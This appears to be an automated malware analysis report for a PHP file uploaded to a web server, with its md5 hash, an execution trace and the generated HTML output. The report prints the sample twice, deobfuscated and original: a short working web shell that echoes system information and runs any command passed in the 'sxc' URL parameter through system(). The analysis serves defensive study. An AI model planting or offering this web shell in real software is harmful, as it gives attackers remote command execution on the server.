PHP Malware Analysis

1.php

md5: 25d5ec11b24d34b0b6d098fbd2ae36d3

Attributes

Environment

Execution

Input


Deobfuscated PHP code

<?php

echo php_uname();
if (isset($_GET['sxc'])) {
    system($_GET['sxc']);
}

Execution traces

data/traces/25d5ec11b24d34b0b6d098fbd2ae36d3_trace-1676247630.5668.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:20:56.464579]
1	0	1	0.000232	393464
1	3	0	0.000285	394328	{main}	1		/var/www/html/uploads/1.php	0	0
2	4	0	0.000301	394328	php_uname	0		/var/www/html/uploads/1.php	2	0
2	4	1	0.000316	394440
2	4	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1	3	1	0.000338	394328
			0.000363	314200
TRACE END   [2023-02-12 22:20:56.464762]


Generated HTML code

<html><head></head><body>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</body></html>

Original PHP code

<?php
echo php_uname();
if(isset($_GET['sxc'])){
    system($_GET['sxc']);
}